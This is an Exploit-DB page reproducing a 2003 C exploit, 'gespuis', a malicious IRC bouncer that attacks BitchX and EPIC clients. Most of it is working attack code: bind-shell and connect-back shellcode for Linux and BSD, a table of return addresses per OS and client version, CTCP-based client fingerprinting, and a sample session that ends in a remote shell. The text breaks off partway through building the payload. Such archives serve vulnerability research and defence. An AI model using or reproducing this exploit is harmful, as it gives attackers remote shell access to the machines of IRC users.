Exploit BitchX 1.0 - Remote 'Send_CTCP()' Memory Corruption

[Exploiter]

EDB-ID

22353

Проверка EDB

1. Пройдено

Автор

ESDEE

Тип уязвимости

REMOTE

Платформа

LINUX

CVE

N/A

Дата публикации

2003-03-06

// source: https://www.securityfocus.com/bid/7097/info

A memory corruption vulnerability has been discovered in BitchX 1.0c19. This issue occurs when handling server-supplied data and may cause characters to be written to sensitive stack memory. As a result, it may be possible for a malicious IRC server to execute arbitrary commands on a vulnerable client. 

This vulnerability has been reported to affect BitchX 1.0c19. Other versions may also be affected.

/* _ ________ _____ ______ 06-03-2003
 __ ___ ____ /____.------` /_______.------.___.----` ___/____ ____
___
 _/ \ _ /\ __. __// ___/_ ___. /_\ /_ | _/
 ___ ._\ . \\ /__ _____/ _ / \_ | /__ | _| slc | _____
 _
 - -------\______||--._____\---._______//-|__ //-.___|----._____||
 / \ /
 remote BitchX/Epic Exploit (serverside) \/ by eSDee of Netric
 ------------------------------------------------------------------------------
-
 (www.netric.be|org)

 "gespuis.c" is an irc bouncer, that can exploit BitchX/Epic clients.
 Copyright (c) 2003 Netric Security
 All rights reserved.

 [esdee@flopppp]$ ./gespuis -v irc.netric.org
 [remote BitchX/Epic exploit (serverside) by eSDee of Netric
(www.netric.be|org)]
 ------------------------------------------------------------------------------
-
 Verbose mode.
 Waiting for connections...
 [10.0.0.2] Connected... [esdee]
 [10.0.0.2] Sending CTCP VERSION...
 [10.0.0.2] Client version: BitchX-1.0c17+ by panasync - OpenBSD 3.2
 [10.0.0.2] Target found. [ret: 0xcfbf7c1c]
 [10.0.0.2] Bindshell is running on port 0xb0ef(45295).

 [esdee@flopppp]$ telnet 10.0.0.2 45295
 Trying 10.0.0.2...
 Connected to 10.0.0.2.
 Escape character is '^]'.
 uname -a; id;
 OpenBSD pant0ffel 3.2 pant0ffel#1 i386
 uid=1000(esdee) gid=1000(esdee) groups=1000(esdee), 0(wheel)
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdarg.h>
#include <signal.h>
#include <unistd.h>
#include <netdb.h>
#include <ctype.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <sys/socket.h>

char
jmp_code[] =

 /* jumps 0xff bytes ahead.. */
 "\xeb\x09\x58\x31\xdb\xb3\xff\x01\xd8\xff\xe0\xe8\xf2\xff\xff\xff";

char
BSD_bindcode[] =

 /* fork(), execve sh -c [client] [host to bounce to], term=xterm */
 "\x31\xc0\x31\xff\xb0\x02\xcd\x80\x39\xc7\x74\x7e\x31\xc0\x50"
 "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20"
 "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20"
 "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20"
 "\x68\x20\x20\x20\x20\x89\xe1\x50\x66\x68\x2d\x63\x89\xe3\x50"
 "\x66\x68\x73\x68\x89\xe0\x57\x51\x53\x50\x89\xe1\x31\xc0\x50"
 "\x66\x68\x72\x6d\x68\x3d\x78\x74\x65\x68\x54\x45\x52\x4d\x89"
 "\xe2\x50\x52\x89\xe2\x57\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
 "\x69\x89\xe3\x50\x52\x51\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0"
 "\x01\xcd\x80"

 /* forking bindcode (port 0xb0ef)*/
 "\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0"
 "\x61\xcd\x80\x89\xc7\x31\xc0\x50\x50\x50\x66\x68\xb0\xef\xb7\x02"
 "\x66\x53\x89\xe1\x31\xdb\xb3\x10\x53\x51\x57\x50\xb0\x68\xcd\x80"
 "\x31\xdb\x39\xc3\x74\x06\x31\xc0\xb0\x01\xcd\x80\x31\xc0\x50\x57"
 "\x50\xb0\x6a\xcd\x80\x31\xc0\x31\xdb\x50\x89\xe1\xb3\x01\x53\x89"
 "\xe2\x50\x51\x52\xb3\x14\x53\x50\xb0\x2e\xcd\x80\x31\xc0\x50\x50"
 "\x57\x50\xb0\x1e\xcd\x80\x89\xc6\x31\xc0\x31\xdb\xb0\x02\xcd\x80"
 "\x39\xc3\x75\x44\x31\xc0\x57\x50\xb0\x06\xcd\x80\x31\xc0\x50\x56"
 "\x50\xb0\x5a\xcd\x80\x31\xc0\x31\xdb\x43\x53\x56\x50\xb0\x5a\xcd"
 "\x80\x31\xc0\x43\x53\x56\x50\xb0\x5a\xcd\x80\x31\xc0\x50\x68\x2f"
 "\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0\x3b"
 "\xcd\x80\x31\xc0\xb0\x01\xcd\x80\x31\xc0\x56\x50\xb0\x06\xcd\x80"
 "\xeb\x9a";

char
BSD_connect_back[] =

 /* fork(), execve sh -c [client] [host to bounce to], term=xterm */
 "\x31\xc0\x31\xff\xb0\x02\xcd\x80\x39\xc7\x74\x7e\x31\xc0\x50"
 "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20"
 "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20"
 "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20"
 "\x68\x20\x20\x20\x20\x89\xe1\x50\x66\x68\x2d\x63\x89\xe3\x50"
 "\x66\x68\x73\x68\x89\xe0\x57\x51\x53\x50\x89\xe1\x31\xc0\x50"
 "\x66\x68\x72\x6d\x68\x3d\x78\x74\x65\x68\x54\x45\x52\x4d\x89"
 "\xe2\x50\x52\x89\xe2\x57\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
 "\x69\x89\xe3\x50\x52\x51\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0"
 "\x01\xcd\x80"

 /* connect back shellcode (port=0xb0ef) */
 "\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0"
 "\x61\xcd\x80\x31\xd2\x52\x52\x68\x41\x41\x41\x41\x66\x68\xb0\xef"
 "\xb7\x02\x66\x53\x89\xe1\xb2\x10\x52\x51\x50\x52\x89\xc2\x31\xc0"
 "\xb0\x62\xcd\x80\x31\xdb\x39\xc3\x74\x06\x31\xc0\xb0\x01\xcd\x80"
 "\x31\xc0\x50\x52\x50\xb0\x5a\xcd\x80\x31\xc0\x31\xdb\x43\x53\x52"
 "\x50\xb0\x5a\xcd\x80\x31\xc0\x43\x53\x52\x50\xb0\x5a\xcd\x80\x31"
 "\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54"
 "\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";

char
linux_bindcode[] =

 /* fork(), execve sh -c [client] [host to bounce to], term=xterm */
 "\x31\xc0\x31\xff\xb0\x02\xcd\x80\x39\xc7\x74\x7e\x31\xc0\x50"
 "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20"
 "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20"
 "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20"
 "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x89\xe1\x50\x66\x68"
 "\x2d\x63\x89\xe3\x50\x66\x68\x73\x68\x89\xe0\x57\x51\x53\x50"
 "\x89\xe1\x31\xc0\x50\x66\x68\x72\x6d\x68\x3d\x78\x74\x65\x68"
 "\x54\x45\x52\x4d\x89\xe2\x50\x52\x89\xe2\x57\x68\x6e\x2f\x73"
 "\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80\x31\xc0\xb0"
 "\x01\xcd\x80"

 /* forking bindcode (port 0xb0ef)*/
 "\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51"
 "\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc1\x31\xc0\x31\xdb\x50\x50"
 "\x50\x66\x68\xb0\xef\xb3\x02\x66\x53\x89\xe2\xb3\x10\x53\xb3\x02"
 "\x52\x51\x89\xca\x89\xe1\xb0\x66\xcd\x80\x31\xdb\x39\xc3\x74\x05"
 "\x31\xc0\x40\xcd\x80\x31\xc0\x50\x52\x89\xe1\xb3\x04\xb0\x66\xcd"
 "\x80\x89\xd7\x31\xc0\x31\xdb\x31\xc9\xb3\x11\xb1\x01\xb0\x30\xcd"
 "\x80\x31\xc0\x31\xdb\x50\x50\x57\x89\xe1\xb3\x05\xb0\x66\xcd\x80"
 "\x89\xc6\x31\xc0\x31\xdb\xb0\x02\xcd\x80\x39\xc3\x75\x40\x31\xc0"
 "\x89\xfb\xb0\x06\xcd\x80\x31\xc0\x31\xc9\x89\xf3\xb0\x3f\xcd\x80"
 "\x31\xc0\x41\xb0\x3f\xcd\x80\x31\xc0\x41\xb0\x3f\xcd\x80\x31\xc0"
 "\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x8b\x54\x24"
 "\x08\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80\x31\xc0"
 "\x89\xf3\xb0\x06\xcd\x80\xeb\x99";

char
linux_connect_back[] =

 /* fork(), execve sh -c [client] [host to bounce to], term=xterm */
 "\x31\xc0\x31\xff\xb0\x02\xcd\x80\x39\xc7\x74\x7e\x31\xc0\x50"
 "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20"
 "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20"
 "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20"
 "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x89\xe1\x50\x66\x68"
 "\x2d\x63\x89\xe3\x50\x66\x68\x73\x68\x89\xe0\x57\x51\x53\x50"
 "\x89\xe1\x31\xc0\x50\x66\x68\x72\x6d\x68\x3d\x78\x74\x65\x68"
 "\x54\x45\x52\x4d\x89\xe2\x50\x52\x89\xe2\x57\x68\x6e\x2f\x73"
 "\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80\x31\xc0\xb0"
 "\x01\xcd\x80"

 /* connect back shellcode (port=0xb0ef) */
 "\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51"
 "\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x31\xc9\x51\x51"
 "\x68\x41\x42\x43\x44\x66\x68\xb0\xef\xb1\x02\x66\x51\x89\xe7\xb3"
 "\x10\x53\x57\x52\x89\xe1\xb3\x03\xb0\x66\xcd\x80\x31\xc9\x39\xc1"
 "\x74\x06\x31\xc0\xb0\x01\xcd\x80\x31\xc0\xb0\x3f\x89\xd3\xcd\x80"
 "\x31\xc0\xb0\x3f\x89\xd3\xb1\x01\xcd\x80\x31\xc0\xb0\x3f\x89\xd3"
 "\xb1\x02\xcd\x80\x31\xc0\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f"
 "\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0"
 "\x01\xcd\x80";

struct {
 char *version;
 unsigned long ret;
 unsigned long mprotect;
 char *shellcode;
 int type;
} targets[] = {

 /* FreeBSD targets tested on:
 - FreeBSD 4.7-RELEASE-p3
 - FreeBSD 4.6.2-RELEASE
 - FreeBSD 4.6
 - FreeBSD 4.5-RELEASE

 OpenBSD targets:
 - OpenBSD 3.2
 - OpenBSD 3.1
 - OpenBSD 3.0
 - OpenBSD 2.x

 Linux targets:
 - Redhat 8.0
 - Redhat 7.x
 - Debian 3.0
 - Mandrake 8.x
 - Mandrake 9.0
 - Slackware 8.x
 - Trustix 1.x

 Types:
 0 - BitchX (Linux)
 1 - BitchX (BSD)
 2 - BitchX (BSD - Return into libc - mprotect() (To break the k-rad
theo protection :)
 3 - Epic (Linux)
 4 - Epic (BSD)
 5 - Epic (BSD - Return into libc - mprotect())
 */

 /* Auto targets */

 { "BitchX-1.0c19+ by panasync - Linux 2.", 0xbfff9bd8, 0x00000000,
linux_bindcode, 0},
 { "BitchX-1.0c18+ by panasync - Linux 2.", 0xbfff9bd8, 0x00000000,
linux_bindcode, 0},
 { "BitchX-1.0c17+ by panasync - Linux 2.", 0xbfff9bd8, 0x00000000,
linux_bindcode, 0},
 { "BitchX-1.0c16+ by panasync - Linux 2.", 0xbfff9bd8, 0x00000000,
linux_bindcode, 0},
 { "BitchX-1.0c19+ by panasync - FreeBSD 5", 0xbfbf9c8c, 0x00000000,
BSD_bindcode, 1},
 { "BitchX-1.0c18+ by panasync - FreeBSD 5", 0xbfbf9c8c, 0x00000000,
BSD_bindcode, 1},
 { "BitchX-1.0c17+ by panasync - FreeBSD 5", 0xbfbf9c8c, 0x00000000,
BSD_bindcode, 1},
 { "BitchX-1.0c16+ by panasync - FreeBSD 5", 0xbfbf9c8c, 0x00000000,
BSD_bindcode, 1},
 { "BitchX-1.0c19+ by panasync - FreeBSD 4", 0xbfbf9c8c, 0x00000000,
BSD_bindcode, 1},
 { "BitchX-1.0c18+ by panasync - FreeBSD 4", 0xbfbf9c8c, 0x00000000,
BSD_bindcode, 1},
 { "BitchX-1.0c17+ by panasync - FreeBSD 4", 0xbfbf9c8c, 0x00000000,
BSD_bindcode, 1},
 { "BitchX-1.0c16+ by panasync - FreeBSD 4", 0xbfbf9c8c, 0x00000000,
BSD_bindcode, 1},
 { "BitchX-1.0c19+ by panasync - OpenBSD 3.2", 0xcfbf7c1c, 0x401ec230,
BSD_bindcode, 2},
 { "BitchX-1.0c18+ by panasync - OpenBSD 3.2", 0xcfbf7c1c, 0x401ce230,
BSD_bindcode, 2},
 { "BitchX-1.0c17+ by panasync - OpenBSD 3.2", 0xcfbf7c1c, 0x401cb230,
BSD_bindcode, 2},
 { "BitchX-1.0c16+ by panasync - OpenBSD 3.2", 0xcfbf7c1c, 0x401cb230,
BSD_bindcode, 2},
 { "BitchX-1.0c19+ by panasync - OpenBSD 3", 0xdfbf7f34, 0x00000000,
BSD_bindcode, 1},
 { "BitchX-1.0c18+ by panasync - OpenBSD 3", 0xdfbf7f34, 0x00000000,
BSD_bindcode, 1},
 { "BitchX-1.0c17+ by panasync - OpenBSD 3", 0xdfbf7f34, 0x00000000,
BSD_bindcode, 1},
 { "BitchX-1.0c16+ by panasync - OpenBSD 3", 0xdfbf7f34, 0x00000000,
BSD_bindcode, 1},
 { "BitchX-1.0c19+ by panasync - OpenBSD 2", 0xdfbf7f34, 0x00000000,
BSD_bindcode, 1},
 { "BitchX-1.0c18+ by panasync - OpenBSD 2", 0xdfbf7f34, 0x00000000,
BSD_bindcode, 1},
 { "BitchX-1.0c17+ by panasync - OpenBSD 2", 0xdfbf7f34, 0x00000000,
BSD_bindcode, 1},
 { "BitchX-1.0c16+ by panasync - OpenBSD 2", 0xdfbf7f34, 0x00000000,
BSD_bindcode, 1},
 { "ircII EPIC4-1.1.10 Linux 2.", 0xbfffddf0, 0x00000000, linux_bindcode,
3},
 { "ircII EPIC4-1.1.7 Linux 2.", 0xbfffddf0, 0x00000000, linux_bindcode,
3},
 { "ircII EPIC4-1.1.6 Linux 2.", 0xbfffddf0, 0x00000000, linux_bindcode,
3},
 { "ircII EPIC4-1.1.10 FreeBSD 4", 0xbfbfdf64, 0x00000000, BSD_bindcode,
4},
 { "ircII EPIC4-1.1.7 FreeBSD 4", 0xbfbfdf64, 0x00000000, BSD_bindcode,
4},
 { "ircII EPIC4-1.1.6 FreeBSD 4", 0xbfbfdf64, 0x00000000, BSD_bindcode,
4},
 { "ircII EPIC4-1.1.10 OpenBSD 3.2", 0xcfbf6d74, 0x4026b230,
BSD_bindcode, 5},
 { "ircII EPIC4-1.1.7 OpenBSD 3.2", 0xcfbfbe64, 0x40265230, BSD_bindcode,
5},
 { "ircII EPIC4-1.1.6 OpenBSD 3.2", 0xcfbfbe64, 0x40264230, BSD_bindcode,
5},
 { "ircII EPIC4-1.1.10 OpenBSD 3", 0xdfbf7094, 0x00000000, BSD_bindcode,
4},
 { "ircII EPIC4-1.1.7 OpenBSD 3", 0xdfbf7094, 0x00000000, BSD_bindcode,
4},
 { "ircII EPIC4-1.1.6 OpenBSD 3", 0xdfbf7094, 0x00000000, BSD_bindcode,
4},

 /* manual targets (thanks lucipher and thorax!) */

 { "BitchX-1.0cX - Redhat 8.0", 0xbfff9bd8, 0x00000000, linux_bindcode,
1},
 { "BitchX-1.0cX - Redhat 7.x", 0xbfff9bd8, 0x00000000, linux_bindcode,
1},
 { "BitchX-1.0cX - Debian 3.x", 0xbfff9f0c, 0x00000000, linux_bindcode,
1},
 { "BitchX-1.0cX - Mandrake 9.0", 0xbfff9af0, 0x00000000, linux_bindcode,
1},
 { "BitchX-1.0cX - Mandrake 8.x", 0xbfff9af0, 0x00000000, linux_bindcode,
1},
 { "BitchX-1.0cX - Slackware 8.x", 0xbfff9bd8, 0x00000000,
linux_bindcode, 1},
 { "BitchX-1.0cX - Trustix 1.x", 0x7fff9ddc, 0x00000000, linux_bindcode,
1},
 { "ircII EPIC4-1.1.x Redhat 8.0", 0xbfffdf64, 0x00000000,
linux_bindcode, 3},
 { "ircII EPIC4-1.1.x Redhat 7.x", 0xbfffdf64, 0x00000000,
linux_bindcode, 3},
 { "ircII EPIC4-1.1.x Debian 3.x", 0xbfff9004, 0x00000000,
linux_bindcode, 3},
 { "ircII EPIC4-1.1.x Mandrake 9.0", 0xbfffdf10, 0x00000000,
linux_bindcode, 3},
 { "ircII EPIC4-1.1.x Mandrake 8.x", 0xbfffdf10, 0x00000000,
linux_bindcode, 3},
 { "ircII EPIC4-1.1.x Slackware 8.x", 0xbfffddf0, 0x00000000,
linux_bindcode, 3},
 { "ircII EPIC4-1.1.x Trustix 1.x", 0x7fff8f74, 0x00000000,
linux_bindcode, 3},
 { "Crash - All platforms", 0xBADe5Dee, 0x00000000, linux_bindcode, 0},
};

FILE *log = NULL;

void
usage(char *prog)
{
 fprintf(stderr, "Usage : %s [-c ip address] [-l file] [-p port] [-t
target] [-v] <ircd:port>\n"
 "Example: %s -l /var/log/owned -p 6667 -v irc.netric.org:6668\n\n"
 "-c ip address connect back shellcode (port 45295)\n"
 "-l logfile log output to file\n"
 "-p port the bouncer port\n"
 "-t target force target, don't CTCP version. (Use -t0 for a list)\n"
 "-v verbose mode\n\n", prog, prog);
 exit(1);
}

int
send_text(int sock, char *format, ... )
{
 char buffer[4096];
 va_list arglist;
 va_start (arglist, format);
 vsnprintf(buffer, sizeof(buffer) - 1, format, arglist );
 va_end(arglist);
 return send(sock, buffer, strlen(buffer), 0);
}

int
main(int argc, char *argv[])
{
 char read_buf [4096];
 char log_buffer [1200];
 char ret_buffer [128];
 char buffer [600];

 char sh_buffer [2000];
 char sh_host [36];

 char version [256];
 char nick [256];
 char user [256];
 char ircd_host [256];

 char *ptr;

 unsigned int port = 6667;
 unsigned int ircd_port = 6667;
 unsigned int type = 0;
 unsigned int bytes = 0;

 struct sockaddr_in saddr_in1;
 struct sockaddr_in saddr_in2;
 struct sockaddr_in saddr_in3;

 struct hostent *hp;

 int sock_server = 0;
 int sock_server_new = 0;
 int sock_ircd = 0;

 int sin_size = sizeof(struct sockaddr_in);
 int i = 0;
 int k = 0;
 int size = 0;
 int opt = 0;
 int verbose = 0;
 int connectback = 0;
 int ip1 = 0;
 int ip2 = 0;
 int ip3 = 0;
 int ip4 = 0;

 fd_set fd_read;

 fprintf(stdout, "[remote BitchX/Epic exploit (serverside) by eSDee of
Netric (www.netric.be|org)]\n"
 "-----------------------------------------------------------------------------
--\n");

 while((opt = getopt(argc,argv,"c:l:p:t:v")) !=EOF) {
 switch(opt) {

 case 'c':
 sscanf(optarg, "%d.%d.%d.%d", &ip1, &ip2, &ip3, &ip4);

 linux_connect_back[171] = ip1; BSD_connect_back[162] = ip1;
 linux_connect_back[172] = ip2; BSD_connect_back[163] = ip2;
 linux_connect_back[173] = ip3; BSD_connect_back[164] = ip3;
 linux_connect_back[174] = ip4; BSD_connect_back[165] = ip4;

 for(i = 0; i < sizeof(targets) / 20; i++) {
 switch(targets[i].type) {
 case 0:
 targets[i].shellcode = linux_connect_back;
 break;
 case 3:
 targets[i].shellcode = linux_connect_back;
 break;
 default:
 targets[i].shellcode = BSD_connect_back;
 break;
 }
 }

 fprintf(stdout, "Connecting to: %d.%d.%d.%d:45295\n", ip1, ip2, ip3,
ip4);
 connectback = 1;
 break;
 case 'l':
 if ((log = fopen(optarg,"aw")) == NULL) {
 fprintf(stderr, "Unable to open %s.\n", optarg);
 return -1;
 }
 break;
 case 'p':
 port=atoi(optarg);
 if ((port <= 0) || (port > 65535)) {
 fprintf(stderr,"Invalid port.\n");
 return -1;
 }
 break;
 case 't':
 type = atoi(optarg);
 if (type == 0 || type > sizeof(targets) / 20) {
 for(i = 0; i < sizeof(targets) / 20; i++)
 fprintf(stderr, "%02d. [0x%08x] - %s\n", i + 1,
 (unsigned)targets[i].ret, targets[i].version);
 fprintf(stderr, "\n");
 return -1;
 }

 fprintf(stdout, "Selected: %s [0x%08x]\n", targets[type - 1].version,
(unsigned)targets[type - 1].ret);
 break;
 case 'v':
 fprintf(stdout, "Verbose mode.\n");
 verbose = 1;
 break;
 default:
 usage(argv[0] == NULL ? "gespuis" : argv[0]);
 break;
 }
 }

 if (argv[optind] == NULL) usage(argv[0] == NULL ? "gespuis" : argv[0]);


 sscanf(argv[optind], "%255[^:]:%u", ircd_host, &ircd_port);

 if ((ircd_port <= 0) || (ircd_port > 65535)) {
 fprintf(stderr,"Invalid ircd port.\n");
 return -1;
 }

 if ((hp = gethostbyname(ircd_host)) == NULL) {
 fprintf(stderr, "Unable to resolve %s...\n", ircd_host);
 return -1;
 }

 memset((char *)&saddr_in3, 0x0, sizeof(saddr_in3));
 memcpy((char *)&saddr_in3.sin_addr, hp->h_addr, hp->h_length);

 saddr_in3.sin_family = AF_INET;
 saddr_in3.sin_port = htons(ircd_port);

 if ((sock_server = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
 fprintf(stderr, "socket error.\n");
 return -1;
 }

 setsockopt(sock_server, SOL_SOCKET, SO_REUSEADDR, &sin_size,
sizeof(sin_size));

 saddr_in1.sin_family = AF_INET;
 saddr_in1.sin_port = htons(port);
 saddr_in1.sin_addr.s_addr = INADDR_ANY;

 memset(&saddr_in1.sin_zero, 0x0, 8);

 if (bind(sock_server, (struct sockaddr *)&saddr_in1, sizeof(struct
sockaddr)) == -1) {
 fprintf(stderr, "bind error.\n");
 return -1;
 }

 if (listen(sock_server, 10) == -1) {
 fprintf(stderr, "listen.\n");
 return -1;
 }

 signal(SIGCHLD, SIG_IGN);

 fprintf(stdout, "Waiting for connections...\n");

 while(1) {

 if ((sock_server_new = accept(sock_server, (struct sockaddr
*)&saddr_in2, &sin_size)) == -1) {
 perror("accept");
 continue;
 }

 if (!fork()) {

 close(sock_server);

 memset(version, 0x0, sizeof(version));
 memset(read_buf, 0x0, sizeof(read_buf));

 while(1) {

 if (recv(sock_server_new, read_buf, sizeof(read_buf) - 1, 0) < 0) {
 close(sock_server_new);
 exit(1);
 }

 ptr = strstr(read_buf, "NICK ");

 if (ptr != NULL) {
 memset(nick, 0x00, sizeof(nick));
 strncpy(nick, ptr + 5, sizeof(nick) - 1);

 for (i = 0; i < strlen(nick); i++)
 if(!isprint(nick[i])) nick[i] = 0x00;

 if (verbose == 1) fprintf(stdout, "[%s] Connected... [%s]\n",
 inet_ntoa(saddr_in2.sin_addr), nick);
 }

 ptr = strstr(read_buf, "USER ");
 
 if (ptr != NULL) {
 memset(user, 0x00, sizeof(user));
 strncpy(user, ptr + 5, sizeof(user) - 1);
 
 for (i = 0; i < strlen(user); i++)
 if (!isprint(user[i])) user[i] = 0x00;
 }

 if (strlen(nick) != 0 && strlen(user) != 0) break;
 memset(read_buf, 0x0, sizeof(read_buf));
 }

 if (type == 0) {

 if (verbose == 1) fprintf(stdout, "[%s] Sending CTCP VERSION...\n",
inet_ntoa(saddr_in2.sin_addr));

 if (send_text(sock_server_new, ":[email protected] PRIVMSG a:
%cVERSION%c\n", 0x01, 0x01) < 0) {
 if (verbose == 1) fprintf(stderr, "[%s] send failed!\n",
inet_ntoa(saddr_in2.sin_addr));
 close(sock_server_new);
 exit(1);
 }

 while(1) {

 if (recv(sock_server_new, read_buf, sizeof(read_buf) - 1, 0) < 0) {
 close(sock_server_new);
 exit(1);
 }

 ptr = strstr(read_buf, "VERSION ");

 if (ptr != NULL) {

 for (i = 0; i < sizeof(version) - 1; i++) {
 if (isprint(*(ptr + i + 8))) {
 version[k] = *(ptr + i + 8);
 k++;
 }

 if (*(ptr + i + 8) == ':' && *(ptr + i + 7) == ' ') {
 version[k - 2] = 0x00;
 break;
 }

 if (*(ptr + i + 8) == '-' && *(ptr + i + 9) == ' ' &&
 *(ptr + i + 10) == 'A' && *(ptr + i + 11) == 'c') {
 version[k - 2] = 0x00;
 break;
 }
 }

 if (verbose == 1) fprintf(stdout, "[%s] Client version: %s\n",
inet_ntoa(saddr_in2.sin_addr), version);
 break;
 }

 memset(read_buf, 0x0, sizeof(read_buf))
;
 }

 if (strlen(version) == 0) {
 if (verbose == 1) fprintf(stderr, "[%s] No version given.\n",
inet_ntoa(saddr_in2.sin_addr));
 close(sock_server_new);
 exit(1);
 }

 for(i = 0; i < (sizeof(targets) / 20) - 1; i++) {
 if (memcmp(version, targets[i].version, strlen(targets[i].version)) ==
0) {
 type = i + 1;
 if (verbose == 1) fprintf(stderr, "[%s] Target found. [ret: 0x%08x]\n",
 inet_ntoa(saddr_in2.sin_addr), (unsigned) targets[type - 1].ret);
 break;
 }
 }

 if (type == 0) {
 if (verbose == 1) fprintf(stderr, "[%s] Not found, bouncing to [%s:%u]
...\n",
 inet_ntoa(saddr_in2.sin_addr),ircd_host, ircd_port);

 if ((sock_ircd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
 if (verbose == 1) fprintf(stderr, "[%s] socket error.\n",
 inet_ntoa(saddr_in2.sin_addr));
 close(sock_server_new);
 exit(1);
 }

 if (connect(sock_ircd, (struct sockaddr *)&saddr_in3, sizeof(saddr_in3))
== -1) {
 if (verbose == 1) fprintf(stderr, "[%s] Unable to connect to
[%s:%u].\n",
 inet_ntoa(saddr_in2.sin_addr), ircd_host, ircd_port);
 close(sock_server_new);
 close(sock_ircd);
 exit(1);
 }

 memset(log_buffer, 0x00, sizeof(log_buffer));
 snprintf(log_buffer, sizeof(log_buffer) - 1,
 "NICK %s\nUSER %s\n", nick, user);
 

 if (send(sock_ircd, log_buffer, strlen(log_buffer), 0) < 0) {
 close(sock_server_new);
 close(sock_ircd);
 exit(1);
 }

 memset(read_buf, 0x00, sizeof(read_buf));
 bytes = 1;
 while (bytes) {

 FD_ZERO(&fd_read);
 FD_SET(sock_server_new, &fd_read);
 FD_SET(sock_ircd, &fd_read);

 select(FD_SETSIZE, &fd_read, NULL, NULL, NULL);

 if (FD_ISSET(sock_ircd, &fd_read)) {

 memset(read_buf, 0x00, sizeof(read_buf));
 bytes = recv(sock_ircd, read_buf, sizeof(read_buf), 4);
 if (bytes) send(sock_server_new, read_buf, bytes, 4);

 } else if (FD_ISSET(sock_server_new, &fd_read)) {

 memset(&read_buf, 0x00, sizeof(read_buf));
 bytes = recv(sock_server_new, read_buf, sizeof(read_buf), 4);
 if (bytes) send(sock_ircd, read_buf, bytes, 4);
 }
 }

 close(sock_ircd);
 close(sock_server_new);
 exit(1);
 }
 }

 k = 69;
 i = 0;

 memset(sh_host, 0x00, sizeof(sh_host));
 if (targets[type - 1].type < 3) {
 snprintf(sh_host, sizeof(sh_host) - 1, "BitchX %s:%d", ircd_host,
ircd_port);
 } else {
 snprintf(sh_host, sizeof(sh_host) - 1, "epic %s:%d", ircd_host,
ircd_port);
 }

 strncat(sh_host, " ",
 sizeof(sh_host) - strlen(sh_host) - 1);
 while (1) {

 if (sh_host[i + 0] == 0x00) break;
 linux_bindcode[k - 3] = sh_host[i + 0];
 linux_connect_back[k - 3] = sh_host[i + 0];


 if (sh_host[i + 1] == 0x00) break;
 linux_bindcode[k - 2] = sh_host[i + 1];
 linux_connect_back[k - 2] = sh_host[i + 1];

 if (sh_host[i + 2] == 0x00) break;
 linux_bindcode[k - 1] = sh_host[i + 2];
 linux_connect_back[k - 1] = sh_host[i + 2];

 if (sh_host[i + 3] == 0x00) break;
 linux_bindcode[k - 0] = sh_host[i + 3];
 linux_connect_back[k - 0] = sh_host[i + 3];

 k -= 5;
 i += 4;
 }

 k = 64;
 i = 0;

 while (1) {

 if (sh_host[i + 0] == 0x00) break;
 BSD_bindcode[k - 3] = sh_host[i + 0];
 BSD_connect_back[k - 3] = sh_host[i + 0];

 if (sh_host[i + 1] == 0x00) break;
 BSD_bindcode[k - 2] = sh_host[i + 1];
 BSD_connect_back[k - 2] = sh_host[i + 1];

 if (sh_host[i + 2] == 0x00) break;
 BSD_bindcode[k - 1] = sh_host[i + 2];
 BSD_connect_back[k - 1] = sh_host[i + 2];

 if (sh_host[i + 3] == 0x00) break;
 BSD_bindcode[k - 0] = sh_host[i + 3];
 BSD_connect_back[k - 0] = sh_host[i + 3];

 k -= 5;
 i += 4;
 }

 k = 0;

 usleep(3000000); /* We have to wait a couple of seconds,
 otherwise BitchX/Epic will ignore the clientinfo CTCP. */

 memset(sh_buffer, 0x90, sizeof(sh_buffer));
